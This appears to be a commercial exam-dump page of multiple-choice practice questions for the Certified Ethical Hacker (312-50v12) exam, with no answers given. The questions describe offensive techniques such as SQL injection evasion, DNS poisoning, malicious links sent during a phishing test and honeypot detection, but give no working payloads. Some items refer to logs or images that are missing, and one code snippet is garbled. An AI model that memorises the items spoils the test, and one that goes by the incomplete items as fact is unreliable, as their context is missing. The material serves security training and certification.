What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy?

Options:

A.

Public

B.

Private

C.

Shared

D.

Root

Buy Now
Questions 90

What is the proper response for a NULL scan if the port is closed?

Options:

A.

SYN

B.

ACK

C.

FIN

D.

PSH

E.

RST

F.

No response

Buy Now
Questions 91

Joseph was the Web site administrator for the Mason Insurance in New York, who's main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site. One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker 's message ''Hacker Message: You are dead! Freaks!” From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed to the Web site using his laptop. In his browser, the Web site looked completely intact.

No changes were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using hisdial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page:

After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact. How did the attacker accomplish this hack?

Options:

A.

ARP spoofing

B.

SQL injection

C.

DNS poisoning

D.

Routing table injection

Buy Now
Questions 92

Null sessions are un-authenticated connections (not using a username or password.) to an NT or 2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?

Options:

A.

137 and 139

B.

137 and 443

C.

139 and 443

D.

139 and 445

Buy Now
Questions 93

Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the chosen service call interruptions when they are being run?

Options:

A.

Macro virus

B.

Stealth/Tunneling virus

C.

Cavity virus

D.

Polymorphic virus

Buy Now
Questions 94

What term describes the amount of risk that remains after the vulnerabilities are classified and the countermeasures have been deployed?

Options:

A.

Residual risk

B.

Impact risk

C.

Deferred risk

D.

Inherent risk

Buy Now
Questions 95

Based on the following extract from the log of a compromised machine, what is the hacker really trying to steal?

Options:

A.

har.txt

B.

SAM file

C.

wwwroot

D.

Repair file

Buy Now
Questions 96

What does a firewall check to prevent particular ports and applications from getting packets into an organization?

Options:

A.

Transport layer port numbers and application layer headers

B.

Presentation layer headers and the session layer port numbers

C.

Network layer headers and the session layer port numbers

D.

Application layer port numbers and the transport layer headers

Buy Now
Questions 97

Which results will be returned with the following Google search query? site:target.com – site:Marketing.target.com accounting

Options:

A.

Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting.

B.

Results matching all words in the query.

C.

Results for matches on target.com and Marketing.target.com that include the word “accounting”

D.

Results matching “accounting” in domain target.com but not on the site Marketing.target.com

Buy Now
Questions 98

The change of a hard drive failure is once every three years. The cost to buy a new hard drive is $300. It will require 10 hours to restore the OS and software to the new hard disk. It will require a further 4 hours to restore the database from the last backup to the new hard disk. The recovery person earns $10/hour. Calculate the SLE, ARO, and ALE. Assume the EF = 1(100%). What is the closest approximate cost of this replacement and recovery operation per year?

Options:

A.

$1320

B.

$440

C.

$100

D.

$146

Buy Now
Questions 99

Which definition among those given below best describes a covert channel?

Options:

A.

A server program using a port that is not well known.

B.

Making use of a protocol in a way it is not intended to be used.

C.

It is the multiplexing taking place on a communication link.

D.

It is one of the weak channels used by WEP which makes it insecure

Buy Now
Questions 100

When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router was accessed from the administrator’s Computer to update the router configuration. What type of an alert is this?

Options:

A.

False negative

B.

True negative

C.

True positive

D.

False positive

Buy Now
Questions 101

Which of the following tools can be used to perform a zone transfer?

Options:

A.

NSLookup

B.

Finger

C.

Dig

D.

Sam Spade

E.

Host

F.

Netcat

G.

Neotrace

Buy Now
Questions 102

You have gained physical access to a Windows 2008 R2 server which has an accessible disc drive. When you attempt to boot the server and log in, you are unable to guess the password. In your toolkit, you have an Ubuntu 9.10 Linux LiveCD. Which Linux-based tool can change any user’s password or activate disabled Windows accounts?

Options:

A.

John the Ripper

B.

SET

C.

CHNTPW

D.

Cain & Abel

Buy Now
Questions 103

Which of the following is not a Bluetooth attack?

Options:

A.

Bluedriving

B.

Bluesmacking

C.

Bluejacking

D.

Bluesnarfing

Buy Now
Questions 104

What does the –oX flag do in an Nmap scan?

Options:

A.

Perform an eXpress scan

B.

Output the results in truncated format to the screen

C.

Output the results in XML format to a file

D.

Perform an Xmas scan

Buy Now
Questions 105

User A is writing a sensitive email message to user B outside the local network. User A has chosen to use PKI to secure his message and ensure only user B can read the sensitive email. At what layer of the OSI layer does the encryption and decryption of the message take place?

Options:

A.

Application

B.

Transport

C.

Session

D.

Presentation

Buy Now
Questions 106

CompanyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York, you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware of your test. Your email message looks like this:

From: jim_miller@companyxyz.com

To: michelle_saunders@companyxyz.com Subject: Test message

Date: 4/3/2017 14:37

The employee of CompanyXYZ receives your email message.

This proves that CompanyXYZ’s email gateway doesn’t prevent what?

Options:

A.

Email Masquerading

B.

Email Harvesting

C.

Email Phishing

D.

Email Spoofing

Buy Now
Questions 107

During a recent security assessment, you discover the organization has one Domain Name Server (DNS) in a Demilitarized Zone (DMZ) and a second DNS server on the internal network.

What is this type of DNS configuration commonly called?

Options:

A.

DynDNS

B.

DNS Scheme

C.

DNSSEC

D.

Split DNS

Buy Now
Questions 108

Which of the following is a command line packet analyzer similar to GUI-based Wireshark?

Options:

A.

nessus

B.

tcpdump

C.

ethereal

D.

jack the ripper

Buy Now
Questions 109

What is correct about digital signatures?

Options:

A.

A digital signature cannot be moved from one signed document to another because it is the hash of the original document encrypted with the private key of the signing party.

B.

Digital signatures may be used in different documents of the same type.

C.

A digital signature cannot be moved from one signed document to another because it is a plain hash of the document content.

D.

Digital signatures are issued once for each user and can be used everywhere until they expire.

Buy Now
Questions 110

Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a linux platform?

Options:

A.

Kismet

B.

Abel

C.

Netstumbler

D.

Nessus

Buy Now
Questions 111

Why would you consider sending an email to an address that you know does not exist within the company you are performing a Penetration Test for?

Options:

A.

To determine who is the holder of the root account

B.

To perform a DoS

C.

To create needless SPAM

D.

To illicit a response back that will reveal information about email servers and how they treat undeliverable mail

E.

To test for virus protection

Buy Now
Questions 112

Which of the following programs is usually targeted at Microsoft Office products?

Options:

A.

Polymorphic virus

B.

Multipart virus

C.

Macro virus

D.

Stealth virus

Buy Now
Questions 113

What is the proper response for a NULL scan if the port is open?

Options:

A.

SYN

B.

ACK

C.

FIN

D.

PSH

E.

RST

F.

No response

Buy Now
Questions 114

Steve, a scientist who works in a governmental security agency, developed a technological solution to identify people based on walking patterns and implemented this approach to a physical control access.

A camera captures people walking and identifies the individuals using Steve’s approach.

After that, people must approximate their RFID badges. Both the identifications are required to open the door. In this case, we can say:

Options:

A.

Although the approach has two phases, it actually implements just one authentication factor

B.

The solution implements the two authentication factors: physical object and physical characteristic

C.

The solution will have a high level of false positives

D.

Biological motion cannot be used to identify people

Buy Now
Questions 115

Which is the first step followed by Vulnerability Scanners for scanning a network?

Options:

A.

OS Detection

B.

Firewall detection

C.

TCP/UDP Port scanning

D.

Checking if the remote host is alive

Buy Now
Questions 116

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learnt to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between the two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric is relaying the information between the two. What would you call this attack?

Options:

A.

Interceptor

B.

Man-in-the-middle

C.

ARP Proxy

D.

Poisoning Attack

Buy Now
Questions 117

An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When the investigator attempts to correlate the information in all of the logs, the sequence of many of the logged events do not match up.

What is the most likely cause?

Options:

A.

The network devices are not all synchronized.

B.

Proper chain of custody was not observed while collecting the logs.

C.

The attacker altered or erased events from the logs.

D.

The security breach was a false positive.

Buy Now
Questions 118

Which of the following statements about a zone transfer is correct? (Choose three.)

Options:

A.

A zone transfer is accomplished with the DNS

B.

A zone transfer is accomplished with the nslookup service

C.

A zone transfer passes all zone information that a DNS server maintains

D.

A zone transfer passes all zone information that a nslookup server maintains

E.

A zone transfer can be prevented by blocking all inbound TCP port 53 connections

F.

Zone transfers cannot occur on the Internet

Buy Now
Questions 119

What did the following commands determine?

Options:

A.

That the Joe account has a SID of 500

B.

These commands demonstrate that the guest account has NOT been disabled

C.

These commands demonstrate that the guest account has been disabled

D.

That the true administrator is Joe

E.

Issued alone, these commands prove nothing

Buy Now
Questions 120

Which of the following incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an organization?

Options:

A.

Preparation phase

B.

Containment phase

C.

Identification phase

D.

Recovery phase

Buy Now
Questions 121

Which of the following tools can be used for passive OS fingerprinting?

Options:

A.

nmap

B.

tcpdump

C.

tracert

D.

ping

Buy Now
Questions 122

Which of the following tools is used to analyze the files produced by several packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?

Options:

A.

tcptrace

B.

Nessus

C.

OpenVAS

D.

tcptraceroute

Buy Now
Questions 123

You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist’s email, and you send her an email changing the source email to her boss’s email (boss@company). In this email, you ask for a pdf with information. She reads your email and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain malware) and send back the modified pdf, saying that the links don’t work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What testing method did you use?

Options:

A.

Social engineering

B.

Piggybacking

C.

Tailgating

D.

Eavesdropping

Buy Now
Questions 124

A hacker is an intelligent individual with excellent computer skills and the ability to explore a computer’s software and hardware without the owner’s permission. Their intention can either be to simply gain knowledge or to illegally make changes.

Which of the following class of hacker refers to an individual who works both offensively and defensively at various times?

Options:

A.

White Hat

B.

Suicide Hacker

C.

Gray Hat

D.

Black Hat

Buy Now
Questions 125

A large mobile telephony and data network operator has a data center that houses network elements. These are essentially large computers running on Linux. The perimeter of the data center is secured with firewalls and IPS systems.

What is the best security policy concerning this setup?

Options:

A.

Network elements must be hardened with user ids and strong passwords. Regular security tests and audits should be performed.

B.

As long as the physical access to the network elements is restricted, there is no need for additional measures.

C.

There is no need for specific security measures on the network elements as long as firewalls and IPS systems exist.

D.

The operator knows that attacks and down time are inevitable and should have a backup site.

Buy Now
Questions 126

A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network. What are some things he can do to prevent it? Select the best answers.

Options:

A.

Use port security on his switches.

B.

Use a tool like ARPwatch to monitor for strange ARP activity.

C.

Use a firewall between all LAN segments.

D.

If you have a small network, use static ARP entries.

E.

Use only static IP addresses on all PC's.

Buy Now
Questions 127

Which regulation defines security and privacy controls for Federal information systems and organizations?

Options:

A.

HIPAA

B.

EU Safe Harbor

C.

PCI-DSS

D.

NIST-800-53

Buy Now
Questions 128

The collection of potentially actionable, overt, and publicly available information is known as

Options:

A.

Open-source intelligence

B.

Real intelligence

C.

Social intelligence

D.

Human intelligence

Buy Now
Questions 129

Which method of password cracking takes the most time and effort?

Options:

A.

Dictionary attack

B.

Shoulder surfing

C.

Rainbow tables

D.

Brute force

Buy Now
Questions 130

What is the way to decide how a packet will move from an untrusted outside host to a protected inside that is behind a firewall, which permits the hacker to determine which ports are open and if the packets can pass through the packet-filtering of the firewall?

Options:

A.

Session hijacking

B.

Firewalking

C.

Man-in-the middle attack

D.

Network sniffing

Buy Now
Questions 131

Which address translation scheme would allow a single public IP address to always correspond to a single machine on an internal network, allowing "server publishing"?

Options:

A.

Overloading Port Address Translation

B.

Dynamic Port Address Translation

C.

Dynamic Network Address Translation

D.

Static Network Address Translation

Buy Now
Questions 132

Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is not needed if he properly configures the firewall to allow access just to servers/ports, which can have direct internet access, and block the access to workstations.

Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA.

In this context, what can you say?

Options:

A.

Bob can be right since DMZ does not make sense when combined with stateless firewalls

B.

Bob is partially right. He does not need to separate networks if he can create rules by destination IPs, one by one

C.

Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations

D.

Bob is partially right. DMZ does not make sense when a stateless firewall is available

Buy Now
Questions 133

Which of the following is the BEST way to defend against network sniffing?

Options:

A.

Using encryption protocols to secure network communications

B.

Register all machines MAC Address in a Centralized Database

C.

Use Static IP Address

D.

Restrict Physical Access to Server Rooms hosting Critical Servers

Buy Now
Questions 134

In the field of cryptanalysis, what is meant by a “rubber-hose” attack?

Options:

A.

Forcing the targeted keystream through a hardware-accelerated device such as an ASIC.

B.

A backdoor placed into a cryptographic algorithm by its creator.

C.

Extraction of cryptographic secrets through coercion or torture.

D.

Attempting to decrypt ciphertext by making logical assumptions about the contents of the original plaintext.

Buy Now
Questions 135

An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of packets sent to a Web server in the network’s external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file. What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive?

Options:

A.

Protocol analyzer

B.

Network sniffer

C.

Intrusion Prevention System (IPS)

D.

Vulnerability scanner

Buy Now
Questions 136

Your company performs penetration tests and security assessments for small and medium-sized business in the local area. During a routine security assessment, you discover information that suggests your client is involved with human trafficking.

What should you do?

Options:

A.

Confront the client in a respectful manner and ask her about the data.

B.

Copy the data to removable media and keep it in case you need it.

C.

Ignore the data and continue the assessment until completed as agreed.

D.

Immediately stop work and contact the proper legal authorities.

Buy Now
Questions 137

During a black-box pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?

Options:

A.

Circuit

B.

Stateful

C.

Application

D.

Packet Filtering

Buy Now
Questions 138

A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file is named "nc." The FTP server's access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted the contents of the tarball and ran the script using a function provided by the FTP server's software. The “ps” command shows that the “nc” file is running as process, and the netstat command shows the “nc” process is listening on a network port.

What kind of vulnerability must be present to make this remote attack possible?

Options:

A.

File system permissions

B.

Privilege escalation

C.

Directory traversal

D.

Brute force login

Buy Now
Questions 139

An ethical hacker is hired to evaluate the defenses of an organization's database system which is known to employ a signature-based IDS. The hacker knows that some SQL Injection evasion techniques may allow him

to bypass the system's signatures. During the operation, he successfully retrieved a list of usernames from the database without triggering an alarm by employing an advanced evasion technique. Which of the following

could he have used?

Options:

A.

Utilizing the char encoding function to convert hexadecimal and decimal values into characters that pass-through SQL engine parsing

B.

Using the URL encoding method to replace characters with their ASCII codes in hexadecimal form

C.

Implementing sophisticated matches such as “OR ‘john' = john" in place of classical matches like "OR 1-1"

D.

Manipulating white spaces in SQL queries to bypass signature detection

Buy Now
Questions 140

You are the lead cybersecurity analyst at a multinational corporation that uses a hybrid encryption system to secure inter-departmental communications. The system uses RSA encryption for key exchange and AES for data encryption, taking advantage of the strengths of both asymmetric and symmetric encryption. Each RSA

key pair has a size of 'n' bits, with larger keys providing more security at the cost of slower performance. The time complexity of generating an RSA key pair is O(n*2), and AES encryption has a time complexity of O(n). An attacker has developed a quantum algorithm with time complexity O((log n)*2) to crack RSA encryption. Given *n=4000' and variable ‘AES key size’, which scenario is likely to provide the best balance of security and

performance?

Options:

A.

AES key size=128 bits: This configuration provides less security than option A, but RSA key generation and AES encryption will be faster.

B.

AES key size=256 bits: This configuration provides a high level of security, but RSA key generation may be slow.

C.

AES key size=192 bits: This configuration is a balance between options A and B, providing moderate security and performance.

D.

AES key size=512 bits: This configuration provides the highest level of security but at a significant performance cost due to the large AES key size.

Buy Now
Questions 141

Peter, a system administrator working at a reputed IT firm, decided to work from his home and login remotely. Later, he anticipated that the remote connection could be exposed to session hijacking. To curb this possibility, he implemented a technique that creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information and prevent hackers from decrypting the data flow between the endpoints. What is the technique followed by Peter to send files securely through a remote connection?

Options:

A.

DMZ

B.

SMB signing

C.

VPN

D.

Switch network

Buy Now
Questions 142

Chandler works as a pen-tester in an IT-firm in New York. As a part of detecting viruses in the systems, he uses a detection method where the anti-virus executes the malicious codes on a virtual machine to simulate CPU and memory activities. Which type of virus detection method did Chandler use in this context?

Options:

A.

Heuristic Analysis

B.

Code Emulation

C.

Scanning

D.

Integrity checking

Buy Now
Questions 143

Richard, an attacker, targets an MNC. in this process, he uses a footprinting technique to gather as much information as possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization's network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed by Richard?

Options:

A.

VoIP footprinting

B.

VPN footprinting

C.

Whois footprinting

D.

Email footprinting

Buy Now
Questions 144

Harris is attempting to identify the OS running on his target machine. He inspected the initial TTL in the IP header and the related TCP window size and obtained the following results:

TTL: 64 Window Size: 5840

What is the OS running on the target machine?

Options:

A.

Solaris OS

B.

Windows OS

C.

Mac OS

D.

Linux OS

Buy Now
Questions 145

When configuring wireless on his home router, Javik disables SSID broadcast. He leaves authentication “open” but sets the SSID to a 32-character string of random letters and numbers.

What is an accurate assessment of this scenario from a security perspective?

Options:

A.

Since the SSID is required in order to connect, the 32-character string is sufficient to prevent brute-force attacks.

B.

Disabling SSID broadcast prevents 802.11 beacons from being transmitted from the access point, resulting in a valid setup leveraging “security through obscurity”.

C.

It is still possible for a hacker to connect to the network after sniffing the SSID from a successful wireless association.

D.

Javik’s router is still vulnerable to wireless hacking attempts because the SSID broadcast setting can be enabled using a specially crafted packet sent to the hardware address of the access point.

Buy Now
Questions 146

Which of the following scanning method splits the TCP header into several packets and makes it difficult for packet filters to detect the purpose of the packet?

Options:

A.

ACK flag probe scanning

B.

ICMP Echo scanning

C.

SYN/FIN scanning using IP fragments

D.

IPID scanning

Buy Now
Questions 147

During a reconnaissance mission, an ethical hacker uses Maltego, a popular footprinting tool, to collect information about a target organization. The information includes the target's Internet infrastructure details (domains, DNS names, Netblocks, IP address information). The hacker decides to use social engineering

techniques to gain further information. Which of the following would be the least likely method of social engineering to yield beneficial information based on the data collected?

Options:

A.

Shoulder surfing to observe sensitive credentials input on the target's computers

B.

Impersonating an ISP technical support agent to trick the target into providing further network details

C.

Dumpster diving in the target company’s trash bins for valuable printouts

D.

Eavesdropping on internal corporate conversations to understand key topics

Buy Now
Questions 148

What useful information is gathered during a successful Simple Mail Transfer Protocol (SMTP) enumeration?

Options:

A.

The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.

B.

Reveals the daily outgoing message limits before mailboxes are locked

C.

The internal command RCPT provides a list of ports open to message traffic.

D.

A list of all mail proxy server addresses used by the targeted host

Buy Now
Questions 149

An ethical hacker is testing the security of a website's database system against SQL Injection attacks. They discover that the IDS has a strong signature detection mechanism to detect typical SQL injection patterns.

Which evasion technique can be most effectively used to bypass the IDS signature detection while performing a SQL Injection attack?

Options:

A.

Implement case variation by altering the case of SQL statements

B.

Employ IP fragmentation to obscure the attack payload

C.

Use Hex encoding to represent the SQL query string

D.

Leverage string concatenation to break identifiable keywords

Buy Now
Questions 150

What type of virus is most likely to remain undetected by antivirus software?

Options:

A.

Cavity virus

B.

Stealth virus

C.

File-extension virus

D.

Macro virus

Buy Now
Questions 151

What information security law or standard aims at protecting stakeholders and the general public from accounting errors and fraudulent activities within organizations?

Options:

A.

PCI-DSS

B.

FISMA

C.

SOX

D.

ISO/I EC 27001:2013

Buy Now
Questions 152

As a part of an ethical hacking exercise, an attacker is probing a target network that is suspected to employ various honeypot systems for security. The attacker needs to detect and bypass these honeypots without alerting the target. The attacker decides to utilize a suite of techniques. Which of the following techniques would NOT assist in detecting a honeypot?

Options:

A.

Probing system services and observing the three-way handshake

B.

Using honeypot detection tools like Send-Safe Honeypot Hunter

C.

Implementing a brute force attack to verify system vulnerability

D.

Analyzing the MAC address to detect instances running on VMware

Buy Now
Questions 153

A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine.

Which of the following advanced operators would allow the pen tester to restrict the search to the organization’s web domain?

Options:

A.

[allinurl:]

B.

[location:]

C.

[site:]

D.

[link:]

Buy Now
Questions 154

The network users are complaining because their system are slowing down. Further, every time they attempt to go a website, they receive a series of pop-ups with advertisements. What types of malware have the system been infected with?

Options:

A.

Virus

B.

Spyware

C.

Trojan

D.

Adware

Buy Now
Questions 155

Based on the below log, which of the following sentences are true?

Mar 1, 2016, 7:33:28 AM 10.240.250.23 - 54373 10.249.253.15 - 22 tcp_ip

Options:

A.

Application is FTP and 10.240.250.23 is the client and 10.249.253.15 is the server.

B.

Application is SSH and 10.240.250.23 is the server and 10.249.253.15 is the client.

C.

SSH communications are encrypted; it’s impossible to know who is the client or the server.

D.

Application is SSH and 10.240.250.23 is the client and 10.249.253.15 is the server.

Buy Now
Questions 156

Roma is a member of a security team. She was tasked with protecting the internal network of an organization from imminent threats. To accomplish this task, Roma fed threat intelligence into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the organization's network.

Which type of threat intelligence is used by Roma to secure the internal network?

Options:

A.

Technical threat intelligence

B.

Operational threat intelligence

C.

Tactical threat intelligence

D.

Strategic threat intelligence

Buy Now
Questions 157

A penetration tester is performing an enumeration on a client's network. The tester has acquired permission to perform enumeration activities. They have identified a remote inter-process communication (IPC) share and are trying to collect more information about it. The tester decides to use a common enumeration technique to collect the desired data. Which of the following techniques would be most appropriate for this scenario?

Options:

A.

Brute force Active Directory

B.

Probe the IPC share by attempting to brute force admin credentials

C.

Extract usernames using email IDs

D.

Conduct a DNS zone transfer

Buy Now
Questions 158

You are an ethical hacker contracted to conduct a security audit for a company. During the audit, you discover that the company's wireless network is using WEP encryption. You understand the vulnerabilities associated with WEP and plan to recommend a more secure encryption method. Which of the following would you recommend as a Suitable replacement to enhance the security of the company's wireless network?

Options:

A.

MAC address filtering

B.

WPA2-PSK with AES encryption

C.

Open System authentication

D.

SSID broadcast disabling

Buy Now
Questions 159

A security analyst is investigating a potential network-level session hijacking incident. During the investigation, the analyst finds that the attacker has been using a technique in which they injected an authentic-looking reset packet using a spoofed source IP address and a guessed acknowledgment number. As a result, the victim's connection was reset. Which of the following hijacking techniques has the attacker most likely used?

Options:

A.

TCP/IP hijacking

B.

UDP hijacking

C.

RST hijacking

D.

Blind hijacking

Buy Now
Questions 160

Which of the following allows attackers to draw a map or outline the target organization's network infrastructure to know about the actual environment that they are going to hack.

Options:

A.

Enumeration

B.

Vulnerability analysis

C.

Malware analysis

D.

Scanning networks

Buy Now
Questions 161

Which protocol is used for setting up secure channels between two devices, typically in VPNs?

Options:

A.

PEM

B.

ppp

C.

IPSEC

D.

SET

Buy Now
Questions 162

Rebecca, a security professional, wants to authenticate employees who use web services for safe and secure communication. In this process, she employs a component of the Web Service Architecture, which is an extension of SOAP, and it can maintain the integrity and confidentiality of SOAP messages.

Which of the following components of the Web Service Architecture is used by Rebecca for securing the communication?

Options:

A.

WSDL

B.

WS Work Processes

C.

WS-Policy

D.

WS-Security

Buy Now
Questions 163

Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an attacker, noticed her activities several times and sent a fake email containing a deceptive page link to her social media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link and logged in to that page using her valid credentials. Which of the following tools is employed by Clark to create the spoofed email?

Options:

A.

PyLoris

B.

Slowloris

C.

Evilginx

D.

PLCinject

Buy Now
Questions 164

Which of the following is considered an exploit framework and has the ability to perform automated attacks on services, ports, applications and unpatched security flaws in a computer system?

Options:

A.

Wireshark

B.

Maltego

C.

Metasploit

D.

Nessus

Buy Now
Questions 165

Which among the following is the best example of the hacking concept called "clearing tracks"?

Options:

A.

After a system is breached, a hacker creates a backdoor to allow re-entry into a system.

B.

During a cyberattack, a hacker injects a rootkit into a server.

C.

An attacker gains access to a server through an exploitable vulnerability.

D.

During a cyberattack, a hacker corrupts the event logs on all machines.

Buy Now
Questions 166

As a security analyst for Sky Secure Inc., you are working with a client that uses a multi-cloud strategy, utilizing services from several cloud providers. The client wants to implement a system that will provide unified security management across all their cloud platforms. They need a solution that allows them to consistently enforce security policies, identify and respond to threats, and maintain visibility of all their cloud resources. Which of the following should you recommend as the best solution?

Options:

A.

Use a hardware-based firewall to secure all cloud resources.

B.

implement separate security management tools for each cloud platform.

C.

Use a Cloud Access Security Broker (CASB).

D.

Rely on the built-in security features of each cloud platform.

Buy Now
Questions 167

You are a cybersecurlty consultant for a smart city project. The project involves deploying a vast network of loT devices for public utilities like traffic control, water supply, and power grid management The city administration is concerned about the possibility of a Distributed Denial of Service (DDoS) attack crippling these critical services. They have asked you for advice on how to prevent such an attack. What would be your primary recommendation?

Options:

A.

Implement regular firmware updates for all loT devices.

B.

A Deploy network intrusion detection systems (IDS) across the loT network.

C.

Establish strong, unique passwords for each loT device.

D.

Implement IP address whitelisting for all loT devices.

Buy Now
Questions 168

A penetration tester is tasked with gathering information about the subdomains of a target organization's website. The tester needs a versatile and efficient solution for the task. Which of the following options would be the most effective method to accomplish this goal?

Options:

A.

Employing a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT

B.

Analyzing Linkedin profiles to find employees of the target company and their job titles

C.

Utilizing the Harvester tool to extract email addresses related to the target domain using a search engine like Google or Bing

D.

Using a people search service, such as Spokeo or Intelius, to gather information about the employees of the target organization

Buy Now
Questions 169

John is investigating web-application firewall logs and observers that someone is attempting to inject the following:

char buff[10];

buff[>o] - 'a':

What type of attack is this?

Options:

A.

CSRF

B.

XSS

C.

Buffer overflow

D.

SQL injection

Buy Now
Questions 170

Which wireless security protocol replaces the personal pre-shared key (PSK) authentication with Simultaneous Authentication of Equals (SAE) and is therefore resistant to offline dictionary attacks?

Options:

A.

WPA3-Personal

B.

WPA2-Enterprise

C.

Bluetooth

D.

ZigBee

Buy Now
Questions 171

A penetration tester was assigned to scan a large network range to find live hosts. The network is known for using strict TCP filtering rules on its firewall, which may obstruct common host discovery techniques. The tester needs a method that can bypass these firewall restrictions and accurately identify live systems. What host discovery technique should the tester use?

Options:

A.

UDP Ping Scan

B.

lCMP ECHO Ping Scan

C.

ICMP Timestamp Ping Scan

D.

TCP SYN Ping Scan

Buy Now
Exam Code: 312-50v12
Exam Name: Certified Ethical Hacker Exam (CEHv12)
Last Update: Dec 25, 2024
Questions: 572
312-50v12 pdf

312-50v12 PDF

$25.5  $84.99
312-50v12 Engine

312-50v12 Testing Engine

$30  $99.99
312-50v12 PDF + Engine

312-50v12 PDF + Testing Engine

$40.5  $134.99